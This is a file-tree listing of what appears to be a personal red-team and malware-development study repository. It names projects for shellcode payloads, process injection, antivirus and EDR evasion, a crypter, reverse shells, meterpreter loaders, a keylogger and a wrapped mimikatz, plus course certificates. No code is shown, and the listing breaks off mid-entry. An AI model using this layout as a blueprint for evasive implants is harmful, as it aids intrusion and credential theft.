├── Assembly ├── Linx86-64 │ ├── Readme.md │ ├── call_program │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ └── call_me.o │ ├── execve │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ ├── call_me.o │ │ ├── call_me.so │ │ ├── dump.txt │ │ ├── system.bin │ │ ├── system.c │ │ └── system_O3.bin │ ├── fork_execve │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ ├── call_me.o │ │ ├── dump.txt │ │ ├── how-to │ │ ├── system.bin │ │ ├── system.c │ │ └── useful.txt │ ├── fork_execve_shell │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── call_me │ │ ├── call_me.asm │ │ ├── call_me.assembly │ │ ├── call_me.o │ │ ├── dump.txt │ │ ├── how-to │ │ ├── system.bin │ │ ├── system.c │ │ └── useful.txt │ ├── hello_world │ │ ├── hello │ │ ├── hello.o │ │ └── hello_world.asm │ ├── print_args │ │ ├── print_args │ │ ├── print_args.asm │ │ ├── print_args.assembly │ │ └── print_args.o │ └── push_ret │ │ ├── test │ │ ├── test.asm │ │ ├── test.assembly │ │ ├── test.bin │ │ └── test.o ├── Readme.md ├── Winx32 │ ├── Readme.md │ ├── hellow.asm │ ├── hellow.exe │ ├── hellow.lst │ └── hellow.obj └── Winx64 │ ├── Readme.md │ ├── asm_1 │ ├── hello-win.asm │ ├── hello-win.exe │ ├── hello-win.obj │ ├── hello64.asm │ ├── hello64.fas │ ├── hello64.lst │ ├── hello64.obj │ ├── make │ ├── test.exe │ └── test64.exe │ ├── asm_2 │ ├── hello.asm │ ├── hello.exe │ ├── hello.lst │ ├── hello_new.assembly │ ├── hello_new.exe │ └── hello_new.obj │ ├── call_stack │ ├── Readme.md │ ├── main_clean.cpp │ ├── main_clean.exe │ ├── main_dirty.cpp │ ├── payload.asm │ └── ramp.asm │ └── payloads │ ├── 1.popcalc │ ├── popcalc.asm │ ├── popcalc.exe │ └── popcalc.o │ ├── 2.cmd │ ├── new_cmd.asm │ ├── new_cmd.exe │ └── new_cmd.o │ ├── 3.powershell_multi_command │ ├── new_powershell.asm │ ├── new_powershell.exe │ └── new_powershell.o │ ├── 4.changable_api │ ├── Readme.md │ ├── any_api.asm │ ├── any_api.exe │ └── any_api.o │ ├── 5.ZeroTotal │ ├── Readme.md │ └── calc │ │ └── calc_binja.bin │ ├── 6.meterpreter │ ├── Readme.md │ └── meterpreter_stageless.bin │ └── Readme.md ├── C# ├── CreateProcess │ ├── CreateProcess.sln │ ├── CreateProcess │ │ ├── CreateProcess.csproj │ │ ├── Program.cs │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── CreateProcess.deps.json │ │ │ │ ├── CreateProcess.dll │ │ │ │ ├── CreateProcess.exe │ │ │ │ ├── CreateProcess.pdb │ │ │ │ ├── CreateProcess.runtimeconfig.dev.json │ │ │ │ └── CreateProcess.runtimeconfig.json │ │ └── obj │ │ │ ├── CreateProcess.csproj.nuget.dgspec.json │ │ │ ├── CreateProcess.csproj.nuget.g.props │ │ │ ├── CreateProcess.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── CreateProcess.AssemblyInfo.cs │ │ │ │ ├── CreateProcess.AssemblyInfoInputs.cache │ │ │ │ ├── CreateProcess.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── CreateProcess.assets.cache │ │ │ │ ├── CreateProcess.csproj.AssemblyReference.cache │ │ │ │ ├── CreateProcess.csproj.CoreCompileInputs.cache │ │ │ │ ├── CreateProcess.csproj.FileListAbsolute.txt │ │ │ │ ├── CreateProcess.dll │ │ │ │ ├── CreateProcess.genruntimeconfig.cache │ │ │ │ ├── CreateProcess.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md ├── DInvoke │ ├── CreateProcess_DInvoke │ │ ├── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ │ ├── ConsoleApp1.csproj │ │ │ │ ├── Program.cs │ │ │ │ ├── bin │ │ │ │ └── Debug │ │ │ │ │ └── netcoreapp3.1 │ │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ │ ├── ConsoleApp1.runtimeconfig.json │ │ │ │ │ ├── DInvoke.dll │ │ │ │ │ └── DInvoke.pdb │ │ │ │ └── obj │ │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ │ ├── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete │ │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ │ └── apphost.exe │ │ │ │ ├── project.assets.json │ │ │ │ └── project.nuget.cache │ │ └── Readme.md │ ├── MessageBoxW_DIvoke │ │ ├── MessageBoxW_DIvoke.sln │ │ └── MessageBoxW_DIvoke │ │ │ ├── MessageBoxW_DInvoke.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── DInvoke.dll │ │ │ │ ├── DInvoke.pdb │ │ │ │ ├── MessageBoxW_DInvoke.deps.json │ │ │ │ ├── MessageBoxW_DInvoke.dll │ │ │ │ ├── MessageBoxW_DInvoke.exe │ │ │ │ ├── MessageBoxW_DInvoke.pdb │ │ │ │ ├── MessageBoxW_DInvoke.runtimeconfig.dev.json │ │ │ │ └── MessageBoxW_DInvoke.runtimeconfig.json │ │ │ └── obj │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── DInvoke.dll │ │ │ │ ├── MessageBoxW_DInvoke.AssemblyInfo.cs │ │ │ │ ├── MessageBoxW_DInvoke.AssemblyInfoInputs.cache │ │ │ │ ├── MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── MessageBoxW_DInvoke.assets.cache │ │ │ │ ├── MessageBoxW_DInvoke.csproj.AssemblyReference.cache │ │ │ │ ├── MessageBoxW_DInvoke.csproj.CopyComplete │ │ │ │ ├── MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache │ │ │ │ ├── MessageBoxW_DInvoke.csproj.FileListAbsolute.txt │ │ │ │ ├── MessageBoxW_DInvoke.dll │ │ │ │ ├── MessageBoxW_DInvoke.genruntimeconfig.cache │ │ │ │ ├── MessageBoxW_DInvoke.pdb │ │ │ │ ├── MessageBoxW_DIvoke.AssemblyInfo.cs │ │ │ │ ├── MessageBoxW_DIvoke.AssemblyInfoInputs.cache │ │ │ │ ├── MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── MessageBoxW_DIvoke.assets.cache │ │ │ │ ├── MessageBoxW_DIvoke.csproj.AssemblyReference.cache │ │ │ │ └── apphost.exe │ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.dgspec.json │ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.g.props │ │ │ ├── MessageBoxW_DInvoke.csproj.nuget.g.targets │ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.dgspec.json │ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.g.props │ │ │ ├── MessageBoxW_DIvoke.csproj.nuget.g.targets │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── Readme.md │ └── Syscalls_DInvoke │ │ ├── ConsoleApp1 │ │ ├── ConsoleApp1.sln │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ ├── ConsoleApp1.runtimeconfig.json │ │ │ │ ├── DInvoke.dll │ │ │ │ └── DInvoke.pdb │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ │ └── Readme.md ├── HookBypass │ ├── ConsoleApp1 │ │ ├── ConsoleApp1.sln │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ ├── ConsoleApp1.runtimeconfig.json │ │ │ │ ├── DInvoke.dll │ │ │ │ └── DInvoke.pdb │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.AssemblyReference.cache │ │ │ │ ├── ConsoleApp1.csproj.CopyComplete │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md ├── Ordinal │ ├── Readme.md │ ├── message_box_ordinal.sln │ └── message_box_ordinal │ │ ├── Program.cs │ │ ├── bin │ │ └── Debug │ │ │ └── netcoreapp3.1 │ │ │ ├── message_box_ordinal.deps.json │ │ │ ├── message_box_ordinal.dll │ │ │ ├── message_box_ordinal.exe │ │ │ ├── message_box_ordinal.pdb │ │ │ ├── message_box_ordinal.runtimeconfig.dev.json │ │ │ └── message_box_ordinal.runtimeconfig.json │ │ ├── message_box_ordinal.csproj │ │ └── obj │ │ ├── Debug │ │ └── netcoreapp3.1 │ │ │ ├── apphost.exe │ │ │ ├── message_box_ordinal.AssemblyInfo.cs │ │ │ ├── message_box_ordinal.AssemblyInfoInputs.cache │ │ │ ├── message_box_ordinal.GeneratedMSBuildEditorConfig.editorconfig │ │ │ ├── message_box_ordinal.assets.cache │ │ │ ├── message_box_ordinal.csproj.CoreCompileInputs.cache │ │ │ ├── message_box_ordinal.csproj.FileListAbsolute.txt │ │ │ ├── message_box_ordinal.dll │ │ │ ├── message_box_ordinal.genruntimeconfig.cache │ │ │ └── message_box_ordinal.pdb │ │ ├── message_box_ordinal.csproj.nuget.dgspec.json │ │ ├── message_box_ordinal.csproj.nuget.g.props │ │ ├── message_box_ordinal.csproj.nuget.g.targets │ │ ├── project.assets.json │ │ └── project.nuget.cache ├── PInvoke │ ├── PInvoke.sln │ ├── PInvoke │ │ ├── PInvoke.csproj │ │ ├── Program.cs │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── PInvoke.deps.json │ │ │ │ ├── PInvoke.dll │ │ │ │ ├── PInvoke.exe │ │ │ │ ├── PInvoke.pdb │ │ │ │ ├── PInvoke.runtimeconfig.dev.json │ │ │ │ └── PInvoke.runtimeconfig.json │ │ └── obj │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── PInvoke.AssemblyInfo.cs │ │ │ │ ├── PInvoke.AssemblyInfoInputs.cache │ │ │ │ ├── PInvoke.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── PInvoke.assets.cache │ │ │ │ ├── PInvoke.csproj.AssemblyReference.cache │ │ │ │ ├── PInvoke.csproj.CoreCompileInputs.cache │ │ │ │ ├── PInvoke.csproj.FileListAbsolute.txt │ │ │ │ ├── PInvoke.dll │ │ │ │ ├── PInvoke.genruntimeconfig.cache │ │ │ │ ├── PInvoke.pdb │ │ │ │ └── apphost.exe │ │ │ ├── PInvoke.csproj.nuget.dgspec.json │ │ │ ├── PInvoke.csproj.nuget.g.props │ │ │ ├── PInvoke.csproj.nuget.g.targets │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md ├── ProcessInjection │ ├── ProcessInjection_CreateRemoteThread │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── ProcessInjection_CreateThread │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── ProcessInjection_NtMapViewOfSection │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ ├── ProcessInjection_QueueUserAPC │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.sln │ │ │ └── ConsoleApp1 │ │ │ ├── ConsoleApp1.csproj │ │ │ ├── Program.cs │ │ │ ├── bin │ │ │ └── Debug │ │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.deps.json │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.exe │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ ├── ConsoleApp1.runtimeconfig.dev.json │ │ │ │ └── ConsoleApp1.runtimeconfig.json │ │ │ └── obj │ │ │ ├── ConsoleApp1.csproj.nuget.dgspec.json │ │ │ ├── ConsoleApp1.csproj.nuget.g.props │ │ │ ├── ConsoleApp1.csproj.nuget.g.targets │ │ │ ├── Debug │ │ │ └── netcoreapp3.1 │ │ │ │ ├── ConsoleApp1.AssemblyInfo.cs │ │ │ │ ├── ConsoleApp1.AssemblyInfoInputs.cache │ │ │ │ ├── ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig │ │ │ │ ├── ConsoleApp1.assets.cache │ │ │ │ ├── ConsoleApp1.csproj.CoreCompileInputs.cache │ │ │ │ ├── ConsoleApp1.csproj.FileListAbsolute.txt │ │ │ │ ├── ConsoleApp1.dll │ │ │ │ ├── ConsoleApp1.genruntimeconfig.cache │ │ │ │ ├── ConsoleApp1.pdb │ │ │ │ └── apphost.exe │ │ │ ├── project.assets.json │ │ │ └── project.nuget.cache │ └── Readme.md └── Readme.md ├── C ├── Readme.md ├── code_exec │ ├── Readme.md │ ├── system.bin │ └── system.c ├── custom_payload │ ├── Readme.md │ ├── beautify.py │ ├── call_me │ ├── call_me.asm │ ├── call_me.assembly │ ├── call_me.o │ ├── call_me_2.bak │ ├── dump.txt │ ├── how-to │ ├── system.bin │ ├── system.c │ └── useful.txt ├── meterpreter │ ├── Readme.md │ ├── meterpreter_re_me.exe │ ├── meterpreter_re_me_x64.c │ ├── meterpreter_re_me_x86.c │ ├── patchmeup_meterpreter.c │ └── patchmeup_meterpreter.exe └── undetectable │ ├── compile.bat │ ├── keylogger.h │ ├── undetectable.c │ └── undetectable.exe ├── Certs ├── Certificate-Steve S.pdf ├── Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf ├── Malware Development Advanced - Vol.1-certificate.pdf ├── Malware Development Advanced - Vol.2-certificate.pdf ├── RTMLS_2024-06-14.pdf ├── Readme.md ├── Red-Team-Ops-Completion.jpg ├── Red-Team-Ops-II-Completion.jpg ├── Sektor7_Malware Development Essentials-certificate.pdf ├── Sektor7_Malware Development Intermediate-certificate.pdf ├── Sektor7_Windows Evasion-certificate.pdf ├── THM-JrPenTester.png ├── THM-Offensive_Pentesting.png ├── THM-Red_Team_Learning_Path.png ├── Udemy_Linux-PEAS.jpg ├── Udemy_RE-Exploit-Dev.jpg ├── Udemy_RE-Malware-Net-Java.jpg ├── Udemy_RE-Radare2.jpg ├── Udemy_RE-Windows-GUI.jpg ├── Udemy_Windows-PEAS.jpg ├── Udemy_build_undetectable_malware_in_c.jpg ├── VHL_Advanced+_Certificate.pdf ├── VHL_Basic_Certificate.pdf ├── ZPS_DevOps_For_Pentesters.jpg └── zps_initial_access_cert.jpg ├── Cpp ├── BYOdll │ ├── version1 │ │ ├── Readme.md │ │ ├── beautify.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ └── implant.exe │ ├── version2 │ │ ├── Readme.md │ │ ├── aesencrypt.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ └── implant.exe │ └── version3 │ │ ├── Readme.md │ │ ├── compile.bat │ │ └── implant.cpp ├── Readme.md ├── badAsm │ ├── badAsm.exe │ ├── badAsm.exe.stackdump │ ├── badAsm_better.exe │ ├── badAsm_rx.exe │ ├── main.cpp │ ├── main_better.cpp │ └── main_rx.cpp ├── bad_fn_ptr │ ├── bad_fn_ptr.sln │ ├── bad_fn_ptr │ │ ├── bad_fn_ptr.cpp │ │ ├── bad_fn_ptr.vcxproj │ │ ├── bad_fn_ptr.vcxproj.filters │ │ ├── bad_fn_ptr.vcxproj.user │ │ └── x64 │ │ │ └── Debug │ │ │ ├── bad_fn_ptr.exe.recipe │ │ │ ├── bad_fn_ptr.log │ │ │ ├── bad_fn_ptr.obj │ │ │ ├── bad_fn_ptr.tlog │ │ │ ├── CL.command.1.tlog │ │ │ ├── CL.read.1.tlog │ │ │ ├── CL.write.1.tlog │ │ │ ├── bad_fn_ptr.lastbuildstate │ │ │ ├── link.command.1.tlog │ │ │ ├── link.read.1.tlog │ │ │ ├── link.write.1.tlog │ │ │ └── link.write.2u.tlog │ │ │ ├── vc143.idb │ │ │ └── vc143.pdb │ └── x64 │ │ └── Debug │ │ ├── bad_fn_ptr.exe │ │ ├── bad_fn_ptr.exp │ │ ├── bad_fn_ptr.lib │ │ └── bad_fn_ptr.pdb ├── call_stack │ ├── compile.bat │ ├── main_clean.cpp │ ├── main_clean.exe │ ├── main_dirty.cpp │ ├── main_dirty.exe │ ├── payload.asm │ ├── payload.o │ ├── ramp.asm │ └── ramp.o ├── clean_stacks │ ├── baseline.cpp │ ├── baseline.exe │ ├── implant.cpp │ ├── implant.exe │ ├── implant_backup_1.cpp │ ├── implant_backup_2.cpp │ ├── payload.asm │ ├── payload.o │ ├── ramp.asm │ └── ramp.o ├── create_process │ ├── CreateProcess.cpp │ ├── CreateProcess.exe │ └── Readme.md ├── crypter │ ├── compile.bat │ ├── crypter.exe │ ├── main.cpp │ ├── main.obj │ ├── out.txt │ └── test.txt ├── deceiving_defender │ ├── BigStackBypass │ │ ├── build_the_sleigh.py │ │ ├── compile.bat │ │ ├── implant.cpp │ │ ├── implant.exe │ │ ├── meterpreter │ │ │ ├── Readme.md │ │ │ ├── beautify.py │ │ │ ├── build_the_sleigh.py │ │ │ ├── compile.bat │ │ │ └── implant.cpp │ │ ├── sleight.txt │ │ ├── vt-results-2022-12-28.png │ │ ├── vt_results.txt │ │ └── windows-wallpaper.jpg │ ├── Readme.md │ ├── name_bypass │ │ ├── Readme.md │ │ ├── compile.bat │ │ ├── implant.cpp │ │ └── implant.exe │ └── one │ │ ├── compile.bat │ │ ├── implant.cpp │ │ ├── implant.exe │ │ └── implant.obj ├── embedding_payloads │ ├── Readme.md │ ├── x64 │ │ ├── calc_x64.bin │ │ ├── compile.bat │ │ ├── even_better_x64.exe │ │ ├── even_better_x64_PATCHED.exe │ │ ├── even_better_x64_PATCHED_goto_MAIN.exe │ │ ├── even_better_x64_reloc.exe │ │ ├── good.cpp │ │ ├── good_x64.exe │ │ └── test.c │ └── x86 │ │ ├── calc_payload_32.bin │ │ ├── compile.bat │ │ ├── even_better.exe │ │ ├── even_better_ansi.exe │ │ ├── good.cpp │ │ ├── good.exe │ │ ├── good.obj │ │ ├── good_no_names.exe │ │ ├── good_w_names.exe │ │ ├── x86_broken_log.txt │ │ └── x86_working_log.txt ├── hidden_mimikatz │ ├── Readme.md │ ├── mimikatz.exe │ └── wrapper │ │ ├── aesencrypt.py │ │ ├── compile.bat │ │ ├── favicon.ico │ │ ├── mimikatz.cpp │ │ ├── mimikatz.exe │ │ ├── mimikatz.obj │ │ ├── resources.h │ │ ├── resources.o │ │ ├── resources.rc │ │ ├── resources.res │ │ └── shellcode.bin ├── making_malware │ ├── Readme.md │ ├── implantv1 │ │ ├── beautify.py │ │ ├── compile.bat │ │ ├── implant.obj │ │ ├── implantv1.cpp │ │ ├── implantv1.exe │ │ ├── implantv1.obj │ │ └── xorencrypt.py │ ├── implantv2 │ │ ├── aesencrypt.py │ │ ├── compile.bat │ │ ├── implant.exe │ │ ├── implantv2.cpp │ │ ├── implantv2.cpp.bak │ │ ├── implantv2.obj │ │ ├── reverseDLL.bin │ │ ├── reverseDLL.txt │ │ └── reverseDLL │ │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ ├── ShellcodeRDI.py │ │ │ ├── ShellcodeRDI.pyc │ │ │ ├── __pycache__ │ │ │ │ ├── ShellcodeRDI.cpython-311.pyc │ │ │ │ └── ShellcodeRDI.cpython-38.pyc │ │ │ └── reverseDLL.txt │ │ │ ├── compileDLL.bat │ │ │ ├── reverse.bin │ │ │ ├── reverse.dll │ │ │ ├── reverseDLL.bin │ │ │ └── reverseDLL.cpp │ ├── implantv3 │ │ ├── Main.cpp │ │ ├── Readme.md │ │ └── x64 │ │ │ └── Release │ │ │ ├── implant.exe │ │ │ └── implantv3.pdb │ ├── misc │ │ ├── mm#1 │ │ │ └── Main.cpp │ │ ├── mm#2 │ │ │ ├── Main.cpp │ │ │ └── Readme.md │ │ └── readme.md │ └── revshell │ │ ├── beautify.py │ │ ├── compile.bat │ │ ├── payload.out │ │ ├── reverse.cpp │ │ ├── reverse.exe │ │ ├── reverse.obj │ │ ├── reverseDLL.bin │ │ ├── reverseDLL.txt │ │ ├── reverseDLL │ │ ├── Python │ │ │ ├── ConvertToShellcode.py │ │ │ ├── Python.pyproj │ │ │ ├── ShellcodeRDI.py │ │ │ ├── ShellcodeRDI.pyc │ │ │ ├── __pycache__ │ │ │ │ ├── ShellcodeRDI.cpython-311.pyc │ │ │ │ └── ShellcodeRDI.cpython-38.pyc │ │ │ └── reverseDLL.txt │ │ ├── compileDLL.bat │ │ ├── reverse.dll │ │ ├── reverseDLL.bin │ │ └── reverseDLL.cpp │ │ ├── reverseEXE.bin │ │ └── reverseEXE.txt ├── message_box │ ├── Readme.md │ ├── message_box.cpp │ └── message_box.exe ├── recursion_off_the_disk │ ├── ROTD │ │ ├── ROTD.exe │ │ ├── ROTD.pdb │ │ ├── ROTD_orig.exe │ │ ├── compile.bat │ │ ├── favicon.ico │ │ ├── resources.h │ │ ├── resources.o │ │ ├── resources.rc │ │ ├── resources.res │ │ ├── reverse_shell.bin │ │ ├── rotd.cpp │ │ ├── rotd.obj │ │ └── xorencrypt.py │ ├── Readme.md │ └── reverse_shell │ │ ├── compile.bat │ │ ├── reverse_shell.cpp │ │ ├── reverse_shell.exe │ │ └── reverse_shell.obj ├── rsrc_injection │ ├── Readme.md │ ├── compile.bat │ ├── favicon.ico │ ├── implant.cpp │ ├── implant.exe │ ├── implant.obj │ ├── msgbox64.bin │ ├── resources.h │ ├── resources.o │ ├── resources.rc │ ├── resources.res │ └── xorencrypt.py └── rsrc_injection_shell │ ├── Readme.md │ ├── compile.bat │ ├── favicon.ico │ ├── implant.cpp │ ├── implant.exe │ ├── implant.obj │ ├── implant_noemul.exe │ ├── resources.h │ ├── resources.o │ ├── resources.rc │ ├── resources.res │ ├── reverse_shell │ ├── compile.bat │ ├── reverse_shell.cpp │ ├── 